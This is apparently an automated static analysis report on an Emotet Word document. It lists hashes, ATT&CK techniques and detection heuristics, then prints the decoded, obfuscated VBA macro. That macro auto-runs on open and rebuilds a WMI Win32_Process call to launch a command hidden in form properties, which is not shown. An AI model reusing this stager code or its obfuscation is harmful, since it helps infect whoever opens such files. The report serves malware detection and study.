Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 0034836b32ab4d57…

MALICIOUS

Office (OLE)

Size: 187.2 KB
Created: 2019-12-16 08:32:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: c9021e20f81822eb361ffde068e93a7e
SHA-1: b3447d37998893ef871c5fe40371ea05ae872ff3
SHA-256: 0034836b32ab4d5707f3b3c5390fdfb85f86b5b7815ad54996a0ef5b9274269a
Risk Score: 272

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1204.002 Malicious File

The sample contains a VBA macro with a hidden UserForm and obfuscated code, a common technique for Emotet. Heuristics indicate a command stager is present, designed to execute code and likely download a secondary payload. The ClamAV signature also explicitly identifies it as Emotet.

Heuristics (9)

  • ClamAV: Doc.Downloader.Emotet-7458423-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7458423-1
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script
    Ggqigemz = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", "qwh_h2bd"), "") + Kyrevpin.Qjniafsohtzkw + "rocess"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Hcdtgxkcthnf = CreateObject(Cgsuqbgrdsd)
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set Gppbksbstrkuz = GetObject(INSN & Ggqigemz)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8109 bytes
SHA-256: e13371cb7926e0cce954e6257119a1bdb1c8a38254c6235468f7edc93492b3e3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
201 of 308 identifiers look randomly generated (e.g. 'qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Kyrevpin"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Qjniafsohtzkw, 0, 0, MSForms, TextBox"
Private Sub Document_open()
      Dim Gpjxzqvhp
      Dim Fbppzklof
      For Jbqaevsyqnuod = Jqhopfvk To 0
         Yfoouubdlcld = xPI
         Ustzgfigymaor = CDbl(3)
         Lnmbhmgzrmf = Tan(MyeW5A)
         Exsrtcwvaowij = 4 - Bngdbmzpz
         Joscmbxkcbuj = (3 - Dwlyptxuzyd)
         Glfispbs = Xcvkzpfh
         Oxqorkivop = CDbl(6)
         Fzryxtbttwwto = Tan(Ixftqzvnivqq)
      Next
      Dim Khrcephzhfyg
      Dim Mqfybxwryui
      For Xcvhxjkoe = Jqhopfvk To 0
         Tvcnqzcrc = xPI
         Afcvqxsjwu = CDbl(3)
         Jxlyaxychy = Tan(MyeW5A)
         Fuibysrlm = 4 - Pfcsnvvv
         Ltqebbte = (3 - Cgwpvork)
         Exvwvtxe = Mclctaswx
         Hvkzjimwydksk = CDbl(6)
         Xtiieotjpzv = Tan(Uwummewblxmkk)
      Next
      Dim Ecafkuwwyx
      Dim Awmjkyoabvneh
      For Linexvvf = Jqhopfvk To 0
         Zkhuucvq = xPI
         Lsyavjyi = CDbl(3)
         Wxsulnltede = Tan(MyeW5A)
         Fkohfhssnoqpt = 4 - Inxnvbhcrmi
         Cmpwtwsqhct = (3 - Xijbesdykqg)
         Uyiwuwabpbzuv = Xblelfeytqhq
         Rvjfxcuhkhwa = CDbl(6)
         Hjhjwlbjf = Tan(Qpzogmgxi)
      Next
Hcdtgxkcthnf
End Sub

Attribute VB_Name = "Jsbkraxy"
Attribute VB_Base = "0{830EAA7A-1B71-4277-B4AB-3EF880367575}{DD105773-569D-4B16-B191-C6B4AFEA6D1F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Lguhsipfaag"
Function Ajueafukppsix()
      Dim Dwqunlcvs
      Dim Fqclqftqect
      For Yyvkiorife = Jqhopfvk To 0
         Ttbepqzuql = xPI
         Tqosxcdkvf = CDbl(3)
         Qrmesgampzw = Tan(MyeW5A)
         Mplthtnylqsz = 4 - Cacqnxmnxd
         Jlnuuucb = (3 - Sqomiqfaueu)
         Lmiioeyrhyfjc = Wxwxaoimcbp
         Xjqhonbhll = CDbl(6)
         Nvlsicfeoewhw = Tan(Daggyipuyi)
      Next
Glvgiorl = Kyrevpin.Qjniafsohtzkw
      Dim Rbrxawdabkv
      Dim Iemdgitxw
      For Ovufakqa = Jqhopfvk To 0
         Uzpkrrlriaonn = xPI
         Oycgqqvgni = CDbl(3)
         Xzruumjn = Tan(MyeW5A)
         Toqignvobhfvm = 4 - Ubfzsbbmpor
         Ubebereop = (3 - Hlzhywbnfg)
         Dnmurcbupw = Zcdrvgzetvsh
         Nsmemztqansw = CDbl(6)
         Nnulwehwtk = Tan(Gvqivfrxpihkk)
      Next
Qcxkvwdlvty = Glvgiorl + Jsbkraxy.Kioicuxkupknt + Jsbkraxy.Ecclogdoh + Jsbkraxy.Gqemglefkb
      Dim Yvalekapl
      Dim Zaaslpipywaoo
      For Vkuxvthytqz = Jqhopfvk To 0
         Uuylprti = xPI
         Dvudmjxh = CDbl(3)
         Rpqvnkfsc = Tan(MyeW5A)
         Lkgvexoy = 4 - Fujqcbqvpv
         Ykeddyfmbft = (3 - Knhhljjpvmug)
         Joxnmtymvq = Qskkzbmyrnin
         Zxcykwynvx = CDbl(6)
         Hdsyrrgqsqfl = Tan(Uguvfjjzubjx)
      Next
Ovrexuwvzbhqc = Qcxkvwdlvty + Jsbkraxy.Zdvhlzvvtqot + Jsbkraxy.Dmgujvpeglnv
      Dim Rrqrbdqma
      Dim Vjuanewyu
      For Lmxwhzacwkh = Jqhopfvk To 0
         Koturumlcgitm = xPI
         Zsaqcefdt = CDbl(3)
         Rlyaxogwpzlch = Tan(MyeW5A)
         Bigpduvucekr = 4 - Flzpudancitm
         Hnqsqjcwxeb = (3 - Rvwnxfbkommn)
         Ogxvqehmpnra = Inunshjrgvwh
         Tbdfusoq = CDbl(6)
         Lxnfgivwoj = Tan(Ryuoiwac)
      Next
Ajueafukppsix = Muclacme + Ovrexuwvzbhqc + Muclacme
      Dim Kffoulmvin
      Dim Kpbtitdwkknt
      For Pmmiryxnpi = Jqhopfvk To 0
         Wqmtbddgft = xPI
         Knblcarml = CDbl(3)
         Aiawqvwztlvwn = Tan(MyeW5A)
         Jkpvhvlhxdx = 4 - Pqvbptmlah
         Ititpqoblq = (3 - Qabpbcssjlkcq)
         Txfjcckyb = Imjkayizkos
         Xoucxjgdvj = CDbl(6)
         Fhftfbzm = Tan(Gjykltrjsaav)
      Next
End Function
Function Hcdtgxkcthnf()
      Dim Wbhknmln
      Dim Slmggfpbmgz
      For Wsuwgnagssq = Jqhopfvk To 0
         Ucfsyhagobznl = xPI
         Oaqetkksspf = CDbl(3)
         Hatwtklnwt = Tan(MyeW5A)
         Ckirvjuxkrsc = 4 - Ljjmcsgpynhd
         Ebsghmqa = (3 - Xgkdapir)
         Ybdjqplnlujsp = Jzmuaclhjpwh
         Ifqttbcxips = CDbl(6)
         Ohqerqlq = Tan(Xjwntuuuhixdo)
      Next
Ggqigemz = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", "qwh_h2bd"), "") + Kyrevpin.Qjniafsohtzkw + "rocess"
      Dim Aefucgbnwqx
      Dim Xxydeehlhfg
      For Gsucpyhqhxvx = Jqhopfvk To 0
         Juynlxgvvm = xPI
         Vpeszzvjaist = CDbl(3)
         Nypacgbryrjru = Tan(MyeW5A)
         Kxiiudsmox = 4 - Umabemmj
         Ujntdqmji = (3 - Wplklgvvmacg)
         Fypfeired = Uazbzfpqgxwor
         Rovgsciny = CDbl(6)
         Edwdrljlqfvun = Tan(Qyiijylyrcj)
      Next
Set Gppbksbstrkuz = GetObject(INSN & Ggqigemz)
      Dim Pbsegjhkrgb
      Dim Cijmikvjs
      For Zbkptafu = Jqhopfvk To 0
         Mhsuwzyckruj = xPI
         Zrvnhhgwxqeey = CDbl(3)
         Rbhtlqaqrlk = Tan(MyeW5A)
         Imgpqnpbe = 4 - Unpkbpsbgmt
         Qzgybdcxkzo = (3 - Onldomkuzx)
         Pbtjqupwtzr = Abopjnayrae
         Xggtrbfi = CDbl(6)
         Jntfzpqp = Tan(Mnlvepja)
      Next
Fixnlgod = Ggqigemz + Jsbkraxy.Gpqvirrnj.ControlTipText + Jsbkraxy.Dymsoqgugp.ControlTipText
      Dim Kjvncqehrk
      Dim Iveuhckcmyn
      For Pcqxnmgvlddj = Jqhopfvk To 0
         Gukinytb = xPI
         Pcaqizlvr = CDbl(3)
         Nnkexhsxsak = Tan(MyeW5A)
         Dicpafanzmhlm = 4 - Mrisfqsgae
         Bekeesbmaxw = (3 - Rzobctlrfk)
         Sejlbblkoyjo = Skcmovng
         Efykeywtjlm = CDbl(6)
         Byvkkwspatza = Tan(Tvgfmqshwda)
      Next
Cgsuqbgrdsd = Fixnlgod + Kyrevpin.Qjniafsohtzkw
      Dim Msabphthqor
      Dim Atdaqpuvodjk
      For Ulvgipvpjxbpu = Jqhopfvk To 0
         Zzcnevnav = xPI
         Wvyoqqnkzvvh = CDbl(3)
         Ykkfzavfnoeh = Tan(MyeW5A)
         Bgkzvoszruhlc = 4 - Mersufkduvk
         Ijkisojslvmu = (3 - Tqyoymoakmocs)
         Qelqaqhj = Naxbifyugqmv
         Ldiyxuqwsp = CDbl(6)
         Adzjmgawlmq = Tan(Hqhmaqux)
      Next
Set Hcdtgxkcthnf = CreateObject(Cgsuqbgrdsd)
      Dim Plmhwuwn
      Dim Csqbqyvan
      For Mnazstuzzxskh = Jqhopfvk To 0
         Jsxmtwfr = xPI
         Dukmeotg = CDbl(3)
         Ymiebboc = Tan(MyeW5A)
         Hirppcdbvb = 4 - Avoykmuiyebg
         Ktkshdjqvvcux = (3 - Slewcmmpdr)
         Zldglnsrk = Ucmjzswp
         Xgtxjzlxdhaf = CDbl(6)
         Esorhfkabi = Tan(Qcmxgcnpbfjj)
      Next
Hcdtgxkcthnf.XSize = False
      Dim Nxfylkeoa
      Dim Ibwmvphvlft
      For Mrcikldpjzkdn = Jqhopfvk To 0
         Nlzkjofevr = xPI
         Xrnzufgltiveo = CDbl(3)
         Ybmiiivh = Tan(MyeW5A)
         Ihjhmgrmo = 4 - Vaqxgvsfpvwgn
         Jipocjnu = (3 - Wegberaxccbvl)
         Cckjmbwbkw = Adpifezjrlele
         Kdbowoczhd = CDbl(6)
         Wzcwevuztnuvq = Tan(Uqyzfqsmyiim)
      Next
Hcdtgxkcthnf.YSize = False
      Dim Pkmhalvhnlqkk
      Dim Wdyzdawyxzwom
      For Ffyaurpyw = Jqhopfvk To 0
         Iftwregin = xPI
         Qwwtlohewi = CDbl(3)
         Gkmkaigeb = Tan(MyeW5A)
         Srfbiriebrtpb = 4 - Garrmwpz
         Eufagmkzxd = (3 - Nynodromv)
         Ybgnjedcs = Exceufipdaz
         Sexsxkaqtng = CDbl(6)
         Yavubjnx = Tan(Lzxjdfhgybt)
      Next
Do While Gppbksbstrkuz.Create(Null & Ajueafukppsix, Mxxglcgaujc, Hcdtgxkcthnf, Qsqixafbihdx)
Loop
      Dim Xaynyyjdffvrt
      Dim Jlczmqaj
      For Guxnkgwugiuql = Jqhopfvk To 0
         Yjxgihhspgc = xPI
         Lhxrqosdmquzy = CDbl(3)
         Mgtzyjohddz = Tan(MyeW5A)
         Chgiaziyldzxl = 4 - Tchkkufjnc
         Xaunrwtbejm = (3 - Oobdtcmwbnbwp)
         Wytgslly = Iaslhkpikvg
         Tzuqvmtrc = CDbl(6)
         Egpffndpkok = Tan(Ltdlnemxtsag)
      Next
End Function